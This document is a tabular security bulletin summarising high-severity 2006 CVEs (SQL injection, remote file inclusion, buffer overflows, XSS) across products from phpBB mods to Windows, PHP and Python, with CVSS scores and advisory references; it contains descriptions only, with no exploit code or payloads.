Primary Vendor -- Product | Description | | CVSS Score | Source & Patch Info | 4homepages -- 4images
| SQL injection vulnerability in search.php in 4images 1.7.x allows remote authenticated users to execute arbitrary SQL commands via the search_user parameter. | | 7.0 | CVE-2006-5236 BUGTRAQ OTHER-REF OTHER-REF BID XF
| AAIportal -- AAIportal
| Multiple SQL injection vulnerabilities in AAIportal before 1.4.0 allow remote attackers to execute arbitrary SQL commands via unspecified vectors. | | 7.0 | CVE-2006-5225 OTHER-REF OTHER-REF FRSIRT SECUNIA
| Adobe -- ColdFusion MX
| Unspecified vulnerability in a Verity third party library, as used on Adobe ColdFusion MX 7 through MX 7.0.2 and possibly other products, allows local users to execute arbitrary code via unknown attack vectors. | | 7.0 | CVE-2006-3978 OTHER-REF
| Adobe -- Contribute Publishing Server
| Adobe Contribute Publishing Server leaks the administrator password in logs that are created during product installation, which allows local users to gain privileges to the server. | | 7.0 | CVE-2006-5199 ADOBE
| AOL -- YGP Screensaver ActiveX Control
| Buffer overflow in AOL You've Got Pictures (YGP) Screensaver ActiveX control allows remote attackers to execute arbitrary code via unspecified vectors. | | 7.0 | CVE-2006-3887 OTHER-REF CERT-VN
| AOL -- YGP Pic Downloader ActiveX Control
| Buffer overflow in AOL You've Got Pictures (YGP) Pic Downloader ActiveX control allows remote attackers to execute arbitrary code via unspecified vectors. | | 7.0 | CVE-2006-3888 OTHER-REF CERT-VN
| AOL -- AOL Security Edition
| Buffer overflow in the YGPPDownload ActiveX Control (AOL.PicDownloadCtrl.1, YGPPicDownload.dll) in America Online 9.0 Security Edition allows remote attackers to execute arbitrary code via a long argument to the SetAlbumName method. | | 7.0 | CVE-2006-4840 IDEFENSE
| Baumedia -- Newswriter
| PHP remote file inclusion vulnerability in include/main.inc.php in Sebastian Baumann and Philipp Wolfer Newswriter SW 1.42 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the NWCONF_SYSTEM[server_path] parameter, a different vector than CVE-2006-5102. | | 7.0 | CVE-2006-5180 BUGTRAQ OTHER-REF
| Blue Smiley Organizer -- Blue Smiley Organizer
| SQL injection vulnerability in Blue Smiley Organizer before 4.46 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. | | 7.0 | CVE-2006-5237 OTHER-REF BID FRSIRT SECUNIA
| Bulletin Board Ace -- Bulletin Board Ace
| PHP remote file inclusion vulnerability in includes/functions.php in Bulletin Board Ace (BBaCE) 3.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-5187 Milw0rm BID FRSIRT SECUNIA XF
| Cahier de textes -- Cahier de textes
| Multiple SQL injection vulnerabilities in Cahier de textes 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) matiere_ID parameter in lire.php or the (2) classe_ID parameter in lire_a_faire.php. | | 7.0 | CVE-2006-5221 BUGTRAQ OTHER-REF BID FRSIRT SECUNIA
| Computer Associates -- BrightStor ARCServe Backup
| Stack-based buffer overflow in CA BrightStor ARCserver Backup R11.5 client and server allows remote attackers to execute arbitrary code via long messages to the CheyenneDS Mailslot. | | 7.0 | CVE-2006-5142 OTHER-REF OTHER-REF
| Computer Associates -- BrightStor ARCServe Backup Computer Associates -- BrightStor Enterprise Backup Computer Associates -- Business Protection Suite
| Stack-based buffer overflow in the Backup Agent RPC Server (DBASVR.exe) as used in CA BrightStor ARCserve Backup R11.5, Enterprise Backup 10.5, ARCserve Backup v9.01, and Protection Suite r2 allows remote attackers to execute arbitrary code via the RPC routines with opcode (1) 0x01, (2) 0x02, and (3) 0x18. | | 7.0 | CVE-2006-5143 OTHER-REF OTHER-REF OTHER-REF
| Dan Jensen -- Travelsized CMS
| PHP remote file inclusion vulnerability in frontpage.php in Dan Jensen Travelsized CMS 0.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the setup_folder parameter. | | 7.0 | CVE-2006-5182 OTHER-REF BID FRSIRT SECUNIA XF
| Dayfox Designs -- Dayfox Blog
| Multiple PHP remote file inclusion vulnerabilities in Dayfox Designs Dayfox Blog 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the slogin parameter in the (1) adminlog.php, (2) postblog.php, (3) index.php, or (4) index2.php script in /edit. | | 7.0 | CVE-2006-5183 BUGTRAQ XF
| Deep CMS -- Deep CMS
| PHP remote file inclusion vulnerability in index.php in Deep CMS 2.0a allows remote attackers to execute arbitrary PHP code via a URL in the ConfigDir parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-5251 BID
| DeltaScripts -- PHP Classifieds
| Multiple SQL injection vulnerabilities in PHP Classifieds 7.1 allow remote attackers to execute arbitrary SQL commands via (1) the catid_search parameter in search.php and (2) the catid parameter in index.php. | | 7.0 | CVE-2006-5208 OTHER-REF Milw0rm BID FRSIRT XF
| Dimension of phpBB -- Dimension of phpBB
| Multiple PHP remote file inclusion vulnerabilities in Dimension of phpBB 0.2.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) includes/themen_portal_mitte.php or (2) includes/logger_engine.php. | | 7.0 | CVE-2006-5222 OTHER-REF BID FRSIRT SECUNIA XF
| Dimension of phpBB -- Dimension of phpBB
| PHP remote file inclusion vulnerability in includes/functions_kb.php in Dimension of phpBB 0.2.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-5235 FRSIRT
| Dimitri Seitz -- Security Suite IP Logger
| PHP remote file inclusion vulnerability in includes/logger_engine.php in Dimitri Seitz Security Suite IP Logger 1.0.0 in dwingmods for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-5224 OTHER-REF BID FRSIRT SECUNIA XF
| Eazy Cart -- Eazy Cart
| Eazy Cart allows remote attackers to bypass authentication and gain administrative access via a direct request for admin/home/index.php, and possibly other PHP scripts under admin/. | | 10.0 | CVE-2006-5245 BUGTRAQ OTHER-REF OTHER-REF SECUNIA
| Eazy Cart -- Eazy Cart
| Multiple cross-site scripting (XSS) vulnerabilities in Eazy Cart allow remote attackers to inject arbitrary web script or HTML via easycart.php, possibly related to the (1) des and (2) qty parameters in an add action, and via other unspecified vectors. NOTE: some details are obtained from third party information. | | 7.0 | CVE-2006-5247 BUGTRAQ OTHER-REF OTHER-REF SECUNIA
| Emek Portal -- Emek Portal
| SQL injection vulnerability in giris_yap.asp in Emek Portal 2.1 allows remote attackers to execute arbitrary SQL commands by simultaneously injecting into the user name and pass fields in uyegiris.asp, also known as the Kullanici Adi (k_a) and Sifre (sifre) parameters. | | 7.0 | CVE-2006-5217 BUGTRAQ BID
| FreeForum -- FreeForum
| PHP remote file inclusion vulnerability in forum.php in FreeForum 0.9.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the fpath parameter. | | 7.0 | CVE-2006-5230 BUGTRAQ OTHER-REF BID
| Freenews -- Freenews
| PHP remote file inclusion vulnerability in moteur/moteur.php in Prologin.fr Freenews 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the chemin parameter. | | 7.0 | CVE-2006-5226 BUGTRAQ OTHER-REF BID
| HAMweather -- HAMweather
| Eval injection vulnerability in Template.php in HAMweather 3.9.8.4 and earlier allows remote attackers to execute arbitrary code via a modified query string, which is supplied to an eval function call within the do_parse_code function. | | 7.0 | CVE-2006-5185 OTHER-REF OTHER-REF BID FRSIRT SECUNIA XF
| Invision Power Services -- Invision Gallery
| SQL injection vulnerability in Invision Gallery 2.0.7 allows remote attackers to execute arbitrary SQL commands via the album parameter in (1) index.php and (2) forum/index.php, when the rate command in the gallery automodule is used. | | 7.0 | CVE-2006-5206 Milw0rm BID XF
| iSearch -- iSearch
| ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in iSearch 2.16 allow remote attackers to execute arbitrary PHP code via a URL in the isearch_path parameter in (1) index.php, (2) viewcache.php, (3) sitemap.php, (4) isearch.inc.php, (5) google_sitemap.php, (6) stats.php, or (7) auto_spider_img.php. NOTE: this issue has been disputed by a third party who shows that $isearch_path is set to a constant value. CVE analysis as of 20061010 is inconclusive, although the original researcher is known to make mistakes. | | 7.0 | CVE-2006-5232 BUGTRAQ BUGTRAQ BID
| Joshua Muheim -- phpMyWebmin
| Multiple PHP remote file inclusion vulnerabilities in Joshua Muheim phpMyWebmin 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the target parameter in (1) change_preferences2.php, (2) create_file.php, (3) upload_local.php, and (4) upload_multi.php, different vectors than CVE-2006-5124. | | 7.0 | CVE-2006-5181 BUGTRAQ OTHER-REF SECUNIA XF
| Klinza -- Klinza Professional CMS
| PHP remote file inclusion vulnerability in funzioni/lib/show_hlp.php in klinza professional cms 5.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the appl[APPL] parameter. | | 7.0 | CVE-2006-5189 Milw0rm BID XF
| MailEnable -- MailEnable Enterprise MailEnable -- MailEnable Professional
| Buffer overflow in NTLM authentication in MailEnable Professional 2.0 and Enterprise 2.0 allows remote attackers to execute arbitrary code via "the signature field of NTLM Type 1 messages". | | 7.0 | CVE-2006-5176 OTHER-REF OTHER-REF BID FRSIRT SECUNIA XF
| MailEnable -- MailEnable Enterprise MailEnable -- MailEnable Professional
| The NTLM authentication in MailEnable Professional 2.0 and Enterprise 2.0 allows remote attackers to (1) execute arbitrary code via unspecified vectors involving crafted base64 encoded NTLM Type 3 messages, or (2) cause a denial of service via crafted base64 encoded NTLM Type 1 messages, which trigger a buffer over-read. | | 7.0 | CVE-2006-5177 OTHER-REF OTHER-REF BID FRSIRT SECUNIA XF XF
| Microsoft -- .NET Framework
| Cross-site scripting (XSS) vulnerability in Microsoft .NET Framework 2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "ASP.NET controls that set the AutoPostBack property to true". | | 7.0 | CVE-2006-3436 MS
| Microsoft -- XML Core Services Microsoft -- XML Parser
| Buffer overflow in the Extensible Stylesheet Language Transformations (XSLT) processing in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 allows remote attackers to execute arbitrary code via a crafted Web page. | | 7.0 | CVE-2006-4686 MS
| Microsoft -- Windows 2000 Microsoft -- Windows Server 2003 Microsoft -- Windows XP
| Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." | | 7.0 | CVE-2006-4696 MS
| Minichat -- Minichat
| PHP remote file inclusion vulnerability in ftag.php in Minichat 6.0 allows remote attackers to execute arbitrary PHP code via a URL in the mostrar parameter. | | 7.0 | CVE-2006-5283 Milw0rm FRSIRT SECUNIA
| navyism -- n@board
| PHP remote file inclusion vulnerability in naboard_pnr.php in n@board 3.1.9e and earlier allows remote attackers to execute arbitrary PHP code via a URL in the skin parameter. | | 7.0 | CVE-2006-5281 Milw0rm FRSIRT SECUNIA XF
| Nivisec -- User Viewed Posts Tracker
| PHP remote file inclusion vulnerability in includes/functions_user_viewed_posts.php in the Nivisec User Viewed Posts Tracker module 1.0 and earlier for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-5223 BUGTRAQ OTHER-REF BID FRSIRT SECUNIA
| Objective Development -- WebYep
| Multiple PHP remote file inclusion vulnerabilities in WebYep 1.1.9, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via the webyep_sIncludePath in (1) files in the programm/lib/ directory including (a) WYApplication.php, (b) WYDocument.php, (c) WYEditor.php, (d) WYElement.php, (e) WYFile.php, (f) WYHTMLTag.php, (g) WYImage.php, (h) WYLanguage.php, (i) WYLink.php, (j) WYPath.php, (k) WYPopupWindowLink.php, (l) WYSelectMenu.php, and (m) WYTextArea.php; (2) files in the programm/elements/ directory including (n) WYGalleryElement.php, (o) WYGuestbookElement.php, (p) WYImageElement.php, (q) WYLogonButtonElement.php, (r) WYLongTextElement.php, (s) WYLoopElement.php, (t) WYMenuElement.php, and (u) WYShortTextElement.php; and (3) programm/webyeb.php. | | 7.0 | CVE-2006-5220 BUGTRAQ BID
| OpenDock -- Easy Doc
| Multiple PHP remote file inclusion vulnerabilities in OpenDock Easy Doc 1.4 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the doc_directory parameter in (1) down_stat.php, (2) file.php, (3) find_file.php, (4) lib_file.php, and (5) lib_form_file.php in sw/lib_up_file/; (6) find_comment.php, (7) comment.php, and (8) lib_comment.php in sw/lib_comment/; (9) sw/lib_find/find.php; and other unspecified PHP scripts. | | 7.0 | CVE-2006-5243 BUGTRAQ ECHO BID FRSIRT SECTRACK SECUNIA XF
| PHP -- PHP
| Integer overflow in PHP 5 up to 5.1.6 and 4 before 4.3.0 allows remote attackers to execute arbitrary code via an argument to the unserialize PHP function with a large value for the number of array elements, which triggers the overflow in the Zend Engine ecalloc function (Zend/zend_alloc.c). | | 7.0 | CVE-2006-4812 BUGTRAQ OTHER-REF OTHER-REF OTHER-REF REDHAT BID FRSIRT SECTRACK SECUNIA XF
| phpBB Group -- phpBB
| PHP remote file inclusion vulnerability in admin/admin_topic_action_logging.php in Admin Topic Action Logging Mod 0.95 and earlier, as used in phpBB 2.0 up to 2.0.21, allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-5209 Milw0rm XF
| phpGreetz -- phpGreetz
| PHP remote file inclusion vulnerability in includes/footer.php in phpGreetz 0.99 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the PHPGREETZ_INCLUDE_DIR parameter. | | 7.0 | CVE-2006-5192 OTHER-REF BID FRSIRT XF
| phpWebSite -- phpWebSite
| ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in phpWebSite 0.10.2 allow remote attackers to execute arbitrary PHP code via a URL in the PHPWS_SOURCE_DIR parameter in (1) init.php, (2) users.php, (3) Cookie.php, (4) forms.php, (5) Groups.php, (6) ModSetting.php, (7) Calendar.php, (8) DateTime.php, (9) core.php, (10) ImgLibrary.php, (11) Manager.php, and (12) Template.php, and (13) EZform.php. NOTE: CVE disputes this report, since "PHPWS_SOURCE_DIR" is defined as a constant, not accessed as a variable. | | 7.0 | CVE-2006-5234 BUGTRAQ MLIST BID
| PKR Internet -- Taskjitsu
| SQL injection vulnerability in PKR Internet Taskjitsu before 2.0.6 allows remote attackers to execute arbitrary SQL commands via the key parameter, when the limit query parameter is set to customerid. | | 7.0 | CVE-2006-5184 OTHER-REF BID SECUNIA
| Python Software Foundation -- Python
| Buffer overflow in the repr function in Python 2.3 through 2.6 before 20060822 allows context-dependent attackers to cause a denial of service and possibly execute arbitrary code via crafted wide character UTF-32/UCS-4 strings to certain scripts. | | 7.0 | CVE-2006-4980 OTHER-REF OTHER-REF OTHER-REF OTHER-REF UBUNTU BID SECUNIA SECUNIA
| Red Hat -- Red Hat Fedora Core Red Hat -- Red Hat Enterprise Linux
| pam_ldap in nss_ldap on Red Hat Enterprise Linux 4, Fedora Core 3 and earlier, and possibly other distributions does not return an error condition when an LDAP directory server responds with a PasswordPolicyResponse control response, which causes the pam_authenticate function to return a success code even if authentication has failed, as originally reported for xscreensaver. | | 7.0 | CVE-2006-5170 OTHER-REF
| Rob Hensley -- AckerTodo
| Multiple SQL injection vulnerabilities in the Google Gadget login.php (gadget/login.php) in Rob Hensley ackerTodo 4.2 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) up_login, (2) up_pass, or (3) up_num_tasks parameters. | | 7.0 | CVE-2006-5228 BUGTRAQ OTHER-REF OTHER-REF BID FRSIRT SECTRACK SECUNIA XF
| Sergey Lyubka -- Simple HTTPD
| Stack-based buffer overflow in Sergey Lyubka Simple HTTPD (shttpd) 1.34 allows remote attackers to execute arbitrary code via a long URI. | | 7.0 | CVE-2006-5216 OTHER-REF FRSIRT SECUNIA XF
| SH-News -- SH-News
| Multiple PHP remote file inclusion vulnerabilities in SH-News 3.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the scriptpath parameter to (1) report.php, (2) archive.php, (3) comments.php, (4) init.php, or (5) news.php. | | 7.0 | CVE-2006-5282 Milw0rm BID FRSIRT SECUNIA
| TagIt! -- Tagboard
| PHP remote file inclusion vulnerability in tagmin/delTagUser.php in TagIt! Tagboard 2.1.B Build 2 (tagit2b) allows remote attackers to execute arbitrary PHP code via a URL in the configpath parameter. | | 7.0 | CVE-2006-5249 BUGTRAQ MLIST
| TorrentFlux -- TorrentFlux
| Cross-site scripting (XSS) vulnerability in admin.php in TorrentFlux 2.1 allows remote attackers to inject arbitrary web script or HTML via 91) the $user_agent variable, probably obtained from the User-Agent HTTP header, and possibly (2) the $ip_resolved variable. | | 7.0 | CVE-2006-5227 BUGTRAQ OTHER-REF BID SECTRACK SECUNIA XF
| Wheatblog -- Wheatblog
| Multiple cross-site scripting (XSS) vulnerabilities in Wheatblog 1.0 and 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-5195 BID
| WikyBlog -- WikyBlog
| PHP remote file inclusion vulnerability in index.php in Josh Schmidt WikyBlog 1.2.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the includeDir parameter. | | 7.0 | CVE-2006-5193 BUGTRAQ BUGTRAQ BID XF
|